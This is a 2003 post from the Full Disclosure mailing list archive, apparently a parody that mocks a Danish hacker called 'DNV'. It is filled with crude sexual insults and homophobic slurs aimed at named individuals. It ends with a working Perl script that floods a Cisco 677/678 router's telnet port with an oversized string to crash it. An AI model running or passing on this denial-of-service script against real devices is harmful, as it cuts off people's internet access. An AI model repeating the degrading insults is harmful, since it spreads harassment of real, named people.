Full Disclosure mailing list archives
Cisco exploit
From: <dnv () hushmail com>
Date: Mon, 21 Jul 2003 05:07:12 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 hey all.. this is i the l33t hacker DNV i am the best hacker in denmark and i write to all of you to tell u about some very exciting security issues i have not found. once i worked for a very big ISP in denmark, cybercity, where i tested security. I told them "1'm 1337 g1v3 m3 m0r3 m0n3y" but they did not?? they fired me??.. i do not understand why they fired the 1337 DNV.. But i had some inside information on cybercity, other people working there found a security hole in cisco 667.. so i smacked my name on it and send it to all the big mailinglists... hahaha i showed the world that i am 1337. I have a dream to get on TV like all the other 1337 hacker, so i give blowjobs to any jounalists that will listen to me... and once at a 2600 meeting, 2600 is so cool and very 1337, i meet another hacker and he showed me how to hack netpoint on the big hotels to get free internet. So once again i smacked my name and released it on the internet, and told safe2day, the most 1337 security site on the net... hahaha i showed all people that i am 1337. some people say that is was a little bitch and was afraid that we would get in to trouble while we where fooling around with netpoint in the hotal lobby, and that i keept saying shit like "come on lest go, before someone sees us" and if i had not been for the others nothing would had happend... BUT THEY ARE LIEING, they heat me because i got credit for the hack. To all the people at HAL2001 i was the gay dork running aroung in the black "the party" jacket. The party is cool the lamest gamer party in all of europa and sometimes i get small admin jobs.. cause after i got fired i got a new job installing windows boxes, that is very 1337, but it does not pay well.. so i have to suck alot of dick until the day i get real job so i can move out of my mothers house and get my one place. Guess what.. it's time to tell you all about the newest member of #dkw- assstuffing, the biggest and most 1337 hacker #chan in denmark. we all have mad ./ skill and trade lots of warez.. DON'T FUCK WITH US!!! welcome to moro^hning_wood.. a true hacker his activity on Full Disclosure and his allover 1337'ness is proof that he is a true #asstuffing member! and we are looking forward to learn more about the 1337 xss that you master 100%moroning wood you are just to fucking 1337 we love you!!! this is all for now, and remember if you hear the DNV is a credit stealer it is a lie! - --------------------------------------------------------------------- - --- Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR put public on www.deadbeat.dk on 5-5-2003. Thanks to all from DKW-ssstuffing for testing. A warm night i was coding and lisen to some german tecno music trying to find my penis. I've was also trying to dos hackersnacks for making me so damn fat :( But then I put the wrong IP into my scrip my ADSL router lost the Internet connection. I had no clue what happend, so i started to play with my penis. I asked around in #2600dk and sniffy told me that he and padde would stop assfucking and help if i send them somie pic's of my sexy naked body.. no problem there.. i never learned what the problem was but here is a 1337 exploit - --------------------cisco677.pl------------------ #!/usr/bin/perl # close your Cisco 677 up on the Telnet server! # Made for fun only! port 23 is the Telnet server port on the router # By DNV THX to DKW-asstuffing use IO::Socket; use Getopt::Std; getopts('s:', \%args); if(!defined($args{s})){&usage; } $serv = $args{s}; $foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "(23)", ) || die("No Telnet server here! on $args{s}\n"); $remote->autoflush(1); print $remote "$data". $EOL; while (<$remote>){ print } print("\nPackets Sent\n"); sub usage {die("\n$0 -s <server>\n\n");} -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAj8b13QACgkQ4mqq9+Uor6uFggCeIlCyN1D0kwFOyPpPrPZxg09QKVYA oJEKwnq0dyOw2ckm2PpwRjODmCdw =VR6f -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Cisco exploit dnv (Jul 21)
- Re: Cisco exploit tcpdumb (Jul 21)
- Re: Cisco exploit devnull (Jul 22)
- Re: Cisco exploit tcpdumb (Jul 21)
- <Possible follow-ups>
- Re: Cisco exploit dnv (Jul 22)
- Immature blabla / cisco exploit Daniel Berg (Jul 22)
- Re: Immature blabla / cisco exploit Steve (Jul 22)
- Re: Immature blabla / cisco exploit security snot (Jul 22)
- Re: Immature blabla / cisco exploit Ron DuFresne (Jul 22)
- Re: Immature blabla / cisco exploit security snot (Jul 22)
- Re: Immature blabla / cisco exploit madsaxon (Jul 22)
- Immature blabla / cisco exploit Daniel Berg (Jul 22)
- Re: Cisco exploit tcpdumb (Jul 21)